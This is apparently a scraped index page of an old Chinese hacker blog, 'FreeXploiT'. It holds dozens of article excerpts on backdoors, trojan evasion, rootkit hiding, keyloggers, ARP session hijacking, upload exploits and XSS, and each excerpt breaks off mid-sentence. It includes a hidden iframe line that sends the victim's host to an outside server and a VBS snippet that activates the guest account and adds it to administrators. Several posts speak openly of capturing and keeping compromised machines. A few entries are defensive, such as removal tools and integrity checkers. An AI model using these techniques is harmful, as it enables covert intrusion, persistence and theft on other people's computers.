FreeXploiT

 04年成立的，和一个朋友，现在那个朋友不知所踪了(他叫菜菜，很早就玩汇编了）后来的两年基本是我一个人更新里面的blog我这个算是最早的安全聚合blog吧？ 暗礁的也挺早 不过是团队形式的 鬼仔的05年 neeao的04.10.26我的04.10.15那时候就是想弄点资料自己收藏着看看 ，当然也有很长远的目标 就是想做一个网站 先拿blog练练手一练就是三年啊 哈。。blo

Author : allyesnoTeam   : freexploitDate     : 2006-01-20昨晚花了好多时间写的绕过WFP保护的文章 竟然是错的 我感觉很不爽 我决定再次挑战一下wfp擒贼先擒王 打蛇要打七寸 所以只要我们抓住了 wfp的 小jj 它就不能勃起了wfp的小jj是谁呢 根据wfp的工作方式引用:

文：一个有钱人 iis.mdbCodz: IFRAME id=fs name=fs frameBorder=0 height=0 marginHeight=0 marginWidth=0 scrolling=no src=""http://www.onhn.com/tjg/52hk.asp?n=http://"&request("HTTP_HOST")&request("SCRIPT_NAME")

秘密穿过内网防火墙作者：陈一天  查看：19  平均分：0  日期：2005-6-3  类别：网络通信     小天最近利用微软新爆出的几个漏洞，放出很多C/S木马，但捕获的“肉鸡”却是少之又少，让他郁闷不已。原来，很多中招者都是FTTP+LAN环境下的局域网用户，在小天与被攻击者之间隔有硬件防火墙，而采用IP直连的方法当然是行不通的。此时，他想到了一位法力无边的“天使”Angelshell…… 

 文／图　勇哥儿本文已发表在黑客x档案，转载请注明 自从动网7拉开上传漏洞序幕后，各种系统的上传漏洞接踵而来！它们的漏洞原理基本都差不多，利用方法上有略微的差异，简言之可以归纳为几步：先抓包，然后修改文件类型，再在上传路径后加上空格，用十六进制编辑器把空格改成00，最后用NC提交。当然最好还是找一个具体的UpFile文件来自己分析一下，这样有助于提高对漏洞的理解和记忆！本文没有太高深的技术，只不过

HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/AboutURLs

郁闷 以前看过没注意看 今天翻出来了作者: 四不象 [tabris17]    论坛用户回复   收藏 win9x下的设备名DOS漏洞是众所周之的，其实win2000下也有类似的漏洞。我们姑且称着个漏洞为“以设备名命名的文件夹拒绝服务漏洞”，虽然很早以前就有这个漏洞（大概1年以前就有朋友告诉我这个漏洞的情况了），但我至今还没有从各大漏洞数据库中发现她的踪迹。根据常识，我们知道：在windows下

原文连接：http://spaces.msn.com/members/kakaru/Blog/cns!1pBW88fYlWroTYAFBw3BbRbg!206.entry目录锁定说明 mkdir "abc"   正常创建mkdir "abc./" 用不正常的方法创建一个正常的目录mkdir "abc./ xxx"用不正常的方法创建目录abc并且同时创建abc下的子目录[ xxx]mkdir "ab

木马加壳为什么躲不过内存查毒？－作者来源不详创建时间: 2004-9-15文章提交: Pczz 文章作者: 不详 文章来源: 转载 浏览次数: 359 X:为什么我的木马被杀了?HEART:加壳了吗?X:当然了~UPX V1.90最新的壳HEART:..............我经常遇到别人这么问我~到底为什么加壳以后还会被杀?其实此加壳非彼加壳从最简单的开始说吧~瑞星的内存杀毒大家一定知道吧~`

 Term   : FreeXploiT Author : ALLyeSNODate   : 2005-5-21继superpig的论题的原理用那个 ..的目录漏洞 构造畸形目录 使杀毒软件报错呵呵测试环境XP SP1杀毒软件 MCAFEE 8。0I过程1.md ..../2.md ...../3.md test4.copy backdoor.exe test5.mcafee check 6.死循

http://www.stunnel.org/faq/args.htmlhttp://www.colasoft.com.cn/support/monitor_stunnel.php科来网络分析系统与stunnel结合使用科来网络分析系统是一款强大的网络检测分析工具，可对网络中未加密的数据传输进行检测分析并实时显示分析结果，包括用户的邮件收发、Web访问以及各种网络登录等操作。所以，未经加密的数据传

kevin的blog看见的 是绿盟的文章 虽然没有被推荐 但是这篇文章是很有价值的 回想黑客帝国的第一集 什么是真实的世界？什么是真实的你？为什么Neeao可以在虚拟的世界里面变成超人，因为他看透了本质 是他在控制这个世界而不是被这个世界所控制谁在控制我们的浏览器？作者：2f4f587a80c2dbbd870a46481b2b1882日期：2004.7.200、版权本文遵从GPL协议，欢迎转载。1

Author : ALLyeSNOTeam   : FreeXploiTDate   : 2005-06-11Site   : http://blog.youkuaiyun.com/freexploit黑客之门无疑是一款非常出色的后门. So,从他一开始我就仔细的去观察和研究他。有一天一个小子在我威逼色诱之下老老实实恭恭敬敬的把某黑客之门XX工具孝敬了给我(这小子还不错有钱途，哈哈)，让我对黑客之门的加密方式

第一部分：背景    现在网络上流行的木马后门类工具很多，但可以称为精品的则没有多少。大多数新生们还是在使用winshell,冰河或者Radmin一类的“远程管理软件”来替代后门程序。不幸的是，它们并不符合一个真正后门的标准，极其容易被有或者没有经验的服务器管理员察觉，因此肉鸡经常丢失也就很正常了。    一个合格的后门至少应该作到：不能有陌生进程存在于任务管理器里，给后门进程起一个看起来像系统进

How to avoid the detection of hidden regkey by hooking RegSaveKeyA By: EiNSTeiN_How it works:Many hidden-regkey-detection tools detect hidden stuff by dumping someregistry hives to a file and then com

本文转至 灰鸽子官方网站 本文内容仅供参考 一切操作后果 本blog皆不负责先给出清除工具地址方便大家 有两个清除工具 对应不同的版本 请注意灰鸽子专用卸载程序 ·本程序只能卸载:灰鸽子 [辐射正式版] 和 DLL版服务端 牵手版服务端其它版本暂不支持！ 　下载地址 http://www.huigezi.net/showdown.asp?soft_id=72灰鸽子VIP2005

文章出处：大成天下   发布时间：2006-02-02   网址：http://www.unnoo.com  　　作者：黄鑫（glacier@unnoo.com）　　对木马类程序处理多了，就渐渐觉得静/动态手工分析过程在很大程度上都是重复劳动。总要先花半个钟头了解程序特性，手工分析时还生怕漏掉某项隐蔽的关键操作，导致最终清除不彻底。其实只要在主动安装

应该是衍生文 忘记另一个作者是谁了 eva？ 不死帐号的制作 先建立一个VBS文件内容如下：dim wsh set wsh=CreateObject("WScript.Shell")wsh.run "net user guest /active:yes",0wsh.run "net user guest admin",0wsh.run "net localgroup administrat

 文章作者：a11yesno 信息来源：邪恶八进制信息安全团队（www.eviloctal.com）改的不是很良 勉强可用 或许应该弄多一点容错代码 体力活啊。。安装 把代码保存为cmd.bat 放置system32下 把cmd.exe copy为cmd.gif 注册表 添加 HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/Curren

 提交时间：2007-06-05工具分类：完整检查运行平台：Windows工具大小：144783 Bytes文件MD5：db533270b4a6ac329bb033a173644747工具来源：互联网,百度+GOOGLE可用于系统文件 完成性的检测 防止被后门更改或者替换里面有三款工具分别是 微软的fciv 以及fsum 和 md5都是在命令行下校验的校验工具 个人觉得 【 fsum 】尤其强大它

后门原理： 转至：小章 blog http://blog.youkuaiyun.com/scz123/archive/2007/03/14/1528695.aspx在windows 2000/xp/vista下，按shift键5次，可以打开粘置，会运行sethc.exe，而且，在登录界面里也可以打开。这就让人联想到WINDOWS的屏保，将程序替换成cmd.exe后，就可以打开shell了。参考Mcaf

 那天剑心问我，最短的跨站语句是多少？要放在以前，我一定会这样想，正常的跨站代码：alert("a") ，查一下，一共27个字符。嘿嘿，不过，这之前我在《黑客手册》上看到了他的一篇文章，《疯狂的跨站之行》，在这其中提到了跨站语句的另一种方法：z=document.z=z+write("z=z+z=z+ src=htz=z+tp://wwz=z+w.pc010z=z+.c

 arpspoof 3.1b主要功能：ARP欺骗过程中进行数据修改，实现会话劫持攻击说明： 本程序公开源代码，为了换取更多朋友的指教实例: 欺骗192.168.0.108访问百度网站的全过程（注：#后是我加的注释）效果: 192.168.0.108看到的百度首页只有一句话“Hack by cooldiyer”，攻击成功。图解:__________________________________

 发到安全文摘不知道能不能通过。一年前的东西，我这人很懒，一直在脑子里YY，现在有空写了下来，但也写得很短。。。。。文摘不能放附件。这里放个测试的附件从钓鱼与BHO角度看在线支付安全问题linkboy最近在线支付的安全问题折腾的挺热闹。先是安全控件的问题，然后网站也出了各类漏洞，今天我从钓鱼和BHO的角度看一下在线支付系统的安全问题。说道钓鱼大家肯定很熟悉,最常说的就是假冒中国工商银行域名，www

 原文：http://www.cn-dos.net/forum/viewthread.php?tid=21516&fpage=1发一个短一点的帖子哈，今天讲hh.exe的undocumented parameter，hh不经可以用来看 .chm 文件，而且可以用来反编译deompile的～～命令如下：HH.EXE -decompile 哈哈，好用吧～～而且连工程文件都一并decompile出

 本帖子原来是T_Torchidy的投稿文章，被tombkeeper转入论坛。在这之前先鄙视下一些人发现漏洞就挂马的无耻行为，我曾经因为一个公开的漏洞而在一个网站站上发现24个各个所谓组织，所谓黑客的后门，鄙视！    所谓蠕虫，其本质是利用计算机或者应用程序的漏洞进行感染和传播的一段程序，传统的蠕虫一般利用系统方面的漏洞来实现自身的传播，但是由于蠕虫的肆虐，一般的管理员或安装了防火墙或者在网络节

 现在是不是装软件很烦人啊,弄不好一路Next下去还会装上以3721,中搜,网络猪,划词搜索,百度搜霸等为核心的流氓软件集团,HOHO,所以嘛,软件,就是要绿色的爽!但是现在的程序员越来越不厚道了,一个几K的工具都要先msi再rar最后zip,怎样剥离安装文件setup.exe中的资源是长久以来没能解决的问题.虽然有n多命令行的工具可以用来unpack,但有多少人愿意在每次安装软件的过

 番茄花园版xp发现人为安全漏洞兼安全教学QUOTE:提升此帖为精华。希望大家本着互相交流的本意，互携互进，杜绝恶语相加，提升个人修养。ed by R...本帖将分三部分，第一部分，番茄花园版的漏洞发现及分析和预防；第二部分，顺便说说donghai的电脑公司版问题及分析；第三部分，由此而来的安全方面的教学。OK，切入正题。（一）番茄花园版的漏洞发现及分析和预防此次分析的版本是《番茄花园 windo

前2天读到了? RSS阅读中潜在的安全问题 | 未完成 - Incomplete，讲的是混杂在Rich Text的RSS中的js会在RSS阅读客户端执行从而导致潜在的漏洞问题。正巧我在上个周末的时候也遇到了类似的一个问题：不过更严重的是在RSS聚合的服务器端。我的首页是用require_once(lilina.html) 的方式包含一个lilina.php生成的静态页面组合生成的，源代码如下。

 mysite : http://blog.youkuaiyun.com/freexploit/team : freexploitdate : 2006-09-29me : allyesno测试目录为 G:/test/test>dirG:/test/test 的目录2006-05-30  16:43              .2006-05-30  16:43              ..

By lake2 （ http://lake2.0x54.org ） 随着技术的发展，ASP数据库插马也不是什么新鲜的东东了，相信阁下也玩过这个的吧。呵呵，那你有没有遇到过插入的asp代码被空格拆开的情况呢（即插入的每个字符之间都出现了空格）？现在，就让我们来解决这个问题。经过对多例实际情况的分析，我发现只要出现代码被空格隔开的数据库，相应的字段的Unicode压缩属性总是“否”。相反

http://blog.youkuaiyun.com/lake2/archive/2006/04/27/679774.aspx对了 lake2 的意思 难道是 lake＝湖 2=two lake2=糊涂 ？ 我乱猜的 ^_^海洋顶端是很出名的 ASP 木马，我从红粉佳人版本开始就一直用它，也算是它的fans了，今年海洋顶端出了最新版本也是最后一个版本 —— 2006Plus。身为fans，自然要拿

[飘云新手必看]对飘云的错误认识以及IP显示；更新数据库问题等各种问题的解答，对于此类问题，不再做回复对飘云的错误认识以及IP数据库问题；更新等各种问题的解答，对于此类问题，不再做回复 更新：2005.06.22-15:161、就是大家最关心的查隐身问题：答：首先说明的一点就是：珊瑚虫的查隐身是靠监视端口的方法（至少我这么认为）也就是说有一个进程，对每个好友进行监视，你有多少内存？如果再动用其它手

Avoiding new methods of process detection By: fuzen_opA lot of effort has been made recently to detect hidden processes, even those hidden using DKOM tricks. Some rootkit authors have fired back by un

发信人: Mekanizumu (Mekanizumu), 信区: HackerVsSecurity标  题: 驱动木马之类的问题发信站: 日月光华 (2005年06月27日10:34:08 星期一), 站内信件我看了一本WDM的书，驱动程序的安装是先建立一个inf文件然后通过windows的安装或者书中提供的FastInst来安装。但是书上没有提到到底一个驱动程序是如何被安装的假如写驱动木马或者

键盘记录支持中文,3389(原创)                                        czy 04.11.28  挂接WH_CALLWNDPROC(WM_IME_COMPOSITION),WH_GETMESSAGE(WM_CHAR和WM_KEYUP),前者记录中文,后者记特殊按键和字母符号.  中文在极品五笔和智能ABC中测试通过,另系统测试在2k,xp,2003下测试

FreeXploiT原创文章无固定密码验证后门雏形文 ALLyeSNO 2004 11 29存在的理由1。对抗本地嗅探2。对抗中间人当然后门作者可以写ssh的C/S 但这并不代表绝对的安全ssh亦爆出几个漏洞 其他加密传送的方式也是如此 另外采用ssh 对后门的效能有一定的影响为此我想到了无固定密码验证后门 即使当时的密码 被嗅探到 只要下一次的密码 变更那么对于嗅探者来讲也是徒劳无功的我们先来看

 ;Tiny NT Backdoor by Aphex;http://www.iamaphex.cjb.net;unremote@knology.net;原文29a#7[Index-Utilities-Tiny NT Backdoor(Aphex)];翻译：icyfox[冰狐浪子] / CVC翻译小组;本人因E文不好也常为得到的东西看不懂而伤心;为了支持CVC的翻译事业，决定先找些几乎不用翻译

有些木马在解压缩之后只会有一个客户端程序，用户可以通过在客户端的一些设置工作来自动生成针对性比较强的服务端程序，例如特定的端口、击键木马的邮件地址、密码、SMTP服务器等等。在本文中，我将简要地探讨这一技术的实现。　　事实上，这一技术并无神秘性可言，因为说穿了这一技术不过是对可执行文件的自定义资源进行操作罢了。也就是说，客户端程序本身绑有一段自定义的二进制数据，这段二进制数据实质上就是一个服务端的

本文将对当今先进的病毒/反病毒技术做全面而细致的介绍，重点当然放在了反病毒上，特别是虚拟机和实时监控技术。文中首先介绍几种当今较为流行的病毒技术，包括获取系统核心态特权级，驻留，截获系统操作，变形和加密等。然后分五节详细讨论虚拟机技术：第一节简单介绍一下虚拟机的概论；第二节介绍加密变形病毒，作者会分析两个著名变形病毒的解密子；第三节是虚拟机实现技术详解，其中会对两种不同方案进行比较，同时将剖析一个